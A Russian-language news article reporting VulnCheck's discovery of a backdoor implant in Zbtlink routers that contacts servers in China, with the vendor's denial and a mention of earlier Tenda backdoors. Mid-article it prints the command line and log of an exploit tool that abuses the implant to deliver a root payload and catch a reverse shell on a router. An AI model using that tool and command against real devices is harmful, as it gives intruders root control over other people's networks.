В роутерах Zbtlink нашли бэкдор с отправкой внутренних данных третьим лицам

3 мин
В роутерах Zbtlink нашли бэкдор с отправкой внутренних данных третьим лицам

Согласно отчёту компании кибербезопасности VulnCheck, маршрутизаторы, произведённые китайской компанией Zbtlink, поставляются со встроенным бэкдором. Он даёт возможность отправлять внутренние информация третьим лицам каждые 35 секунд.

VulnCheck изучила 20 моделей Zbtlink и обнаружила в прошивке каждой из них бэкдор, который автоматически взаимодействует с облачными серверами в Китае. По словам технического директора Джейкоба Бейнса, он может предоставить компании доступ к другим устройствам, подключённым к сети маршрутизатора.

./build/endlessdoors_linux-arm64 -e -rctlport 7000 -c2 SSLShellServer -lport 4444
time=2026-07-20T17:39:46.362Z level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2026-07-20T17:39:46.452Z level=STATUS msg="Starting TLS listener on 192.168.1.100:4444"
time=2026-07-20T17:39:46.452Z level=STATUS msg="Starting target" index=0 host=192.168.1.1 port=80 ssl=false "ssl auto"=false
time=2026-07-20T17:39:46.452Z level=STATUS msg="rctl C2 listening on 192.168.1.100:7000; waiting up to 30s for the implant to phone home"
time=2026-07-20T17:39:48.361Z level=SUCCESS msg="Implant connected from 192.168.1.1:53028"
time=2026-07-20T17:39:48.361Z level=SUCCESS msg="Registration: class=\"_25.0527_174431\" mac=f8:5e:3c:97:d2:58"
time=2026-07-20T17:39:48.361Z level=STATUS msg="Delivering the payload as root through the implant's popen command channel"
time=2026-07-20T17:39:48.362Z level=SUCCESS msg="Payload delivered as root; awaiting the C2 callback"
time=2026-07-20T17:39:48.362Z level=SUCCESS msg="Exploit successfully completed" exploited=true
time=2026-07-20T17:39:48.367Z level=SUCCESS msg="Caught new shell from 192.168.1.1:53296"
time=2026-07-20T17:39:48.367Z level=STATUS msg="Active shell from 192.168.1.1:53296" sh: can't access tty; job control turned off
BusyBox v1.33.2 (2024-05-16 08:34:26 UTC) built-in shell (ash) /tmp # id
uid=0(root) gid=0(root) groups=0(root)

«Когда вы подключаете свой маршрутизатор к сети, он пытается связаться с сервером в Китае, который затем может полностью контролировать этот маршрутизатор», — сказал Бейнс.

Ранее Федеральная комиссия по связи США уже ввела полный запрет на продажу новых маршрутизаторов иностранного производства, хотя с тех пор она предоставила исключения нескольким производителям, не являющимся китайскими. 

«Что отличает этот случай — и я никогда раньше такого не видел — это то, что это всего лишь имплант. Он просто подключается. Вам не нужно совершать ошибку, открывая его для доступа в интернет», — сказал Бейнс.

Маршрутизаторы Zbtlink продаются по всему миру под торговыми марками Zbtlink и Wiflyer, в том числе на таких платформах, как Amazon. По словам эксперта, они в основном используются в коммерческих, а не в домашних сетях. Он оценивает их количество в 100 тысяч по всему миру, но в отчёте написал, что «реальное число затронутых устройств может быть больше, чем те двадцать моделей, которые мы изучили».

Бейнс говорит, что китайские маршрутизаторы часто маркируются под чужими брендами, то есть переименовываются так, чтобы выглядеть как устройства из другой страны.

«Они выглядят так, будто произведены в Южной Корее или Германии, но на самом деле сделаны в Китае одной компанией. И они могут применять эту прошивку. Мы просто этого не знаем», — сказал он.

Представитель компании Shenzhen Zhibotong Electronics, владеющей Zbtlink, сообщил изданию CNet, что имплант не используется для мониторинга трафика или управления маршрутизаторами.

«Эта опция предназначена исключительно для послепродажного обслуживания и не служит никаким другим целям. Она, как правило, сохраняется только на опытных образцах для помощи клиентам в отладке программного обеспечения и не будет включена в серийные поставки», — заявил Майкл Ся.

Он также сказал, что компания может «предоставить обновлённую прошивку для отключения этой функции удалённого обслуживания». 

Тем не менее в отчёте VulnCheck отмечается, что каждая доступная для загрузки на веб‑сайте Zbtlink релиз прошивки содержала этот имплант.

Ранее в нескольких версиях прошивок китайских роутеров Tenda тоже нашли бэкдор — недокументированный механизм аутентификации, который позволяет получить доступ к веб‑интерфейсу устройства в обход ввода пароля.

Читают сейчас

Nightmare Eclipse опубликовал новую уязвимость нулевого дня в Microsoft Defender

3 часа назад

Nightmare Eclipse опубликовал новую уязвимость нулевого дня в Microsoft Defender

Инженер‑исследователь по ИБ и бывший сотрудник подразделения Microsoft V&M (Microsoft Security Response Center: Vulnerabilities & Mitigation) по имени Абдельхамид Насери (aka Nightmare Eclipse или MSN

Tesla возобновила приём предзаказов на Roadster с депозитом в $50 тысяч

3 часа назад

Tesla возобновила приём предзаказов на Roadster с депозитом в $50 тысяч

Tesla возобновила приём предзаказов на электрический спорткар Roadster, требуя внести депозит в размере $50 тыс.: $5 тыс. с кредитной карты и $45 тыс. банковским переводом на протяжении 10 дней с моме

Владельцы Apple Watch Ultra 4 и Series 12 столкнулись с проблемой перезагрузок устройств из‑за Apple Neural Engine

4 часа назад

Владельцы Apple Watch Ultra 4 и Series 12 столкнулись с проблемой перезагрузок устройств из‑за Apple Neural Engine

Первые владельцы новых смарт‑часов Apple Watch Ultra 4 и Apple Watch Series 12 сообщают о неожиданных перезагрузках своих устройств. Диагностические журналы указывают на связь подобных сбоев с сопроце

Власти Испании распорядились заблокировать Archive.today и его зеркала

4 часа назад

Власти Испании распорядились заблокировать Archive.today и его зеркала

Комиссия по интеллектуальной собственности Министерства культуры Испании распорядилась заблокировать несколько доменов бесплатного сервиса по архивированию веб‑страниц Archive.today. При попытке получ

Доля AI-патчей в движок Linux выросла с 0,33% до 17,25%

4 часа назад

Доля AI-патчей в движок Linux выросла с 0,33% до 17,25%

Каждый шестой патч для Linux Kernel в сентябре был написан с помощью AI. За прошлую неделю разработчики отправили 1634 патча, созданных с участием AI. Это новый рекорд. Доля растёт почти каждый месяц: